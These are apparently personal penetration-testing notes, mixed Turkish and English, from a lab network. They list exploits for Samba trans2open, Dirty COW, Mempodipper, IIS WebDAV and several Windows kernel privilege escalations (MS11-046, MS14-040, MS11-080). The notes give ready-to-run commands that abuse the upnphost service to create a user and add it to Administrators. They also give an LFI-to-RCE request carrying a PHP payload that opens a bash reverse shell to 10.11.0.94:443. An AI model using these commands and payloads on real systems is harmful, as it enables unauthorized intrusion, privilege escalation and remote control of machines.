Common Exploits

Samba trans2open Overflow (Linux x86) / 10.11.1.22

This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8.

dirty cow exploit

Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)

Linux Kernel 2.6.39 < 3.2.2 - 'Mempodipper' Local Privilege Escalation

Webdav exploit

windows/iis/iis_webdav_upload_asp

linux/samba/trans2open (Samba 2.2.x) - exploitdb-link Samba < 2.2.8

samba servisine yönelik kullanılacak exploit

Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046) win7/winserver2008 ve öncesi oslarda çalışıyor. - afd.sys Privilege Escalation (MS14-040), PoC

accesschk.exe

# sc config upnphost binpath= "net eviluser testxlab Password1 /add"
# sc config upnphost binpath= "net localgroup Administrators eviluser /add"
# sc stop upnphost
# sc start upnphost
Servisin Config Ayarlarını Görmek için
# sc qc upnphost
Servislerin izin kontrolleri
# accesschk-xp.exe -uwcqv "Authenticated Users" * /accepteula
kullanımı yazılacak
Notlar
Windows xp, xp sp1, sp2 gibi sistemlerde upnphost servisi üzerinden hak ve yetki yükseltebilirsin.
LFI to RCE
POST /section.php?page=php://input%00
[HTTP POST DATA]
<?php echo shell_exec("bash -i >& /dev/tcp/10.11.0.94/443 0>&1 2>&1"); ?>

ms11-080

https://hackingandsecurity.blogspot.com/2016/05/ms11-080-privilege-escalation-windows.html
hackingandsecurity.blogspot.com
##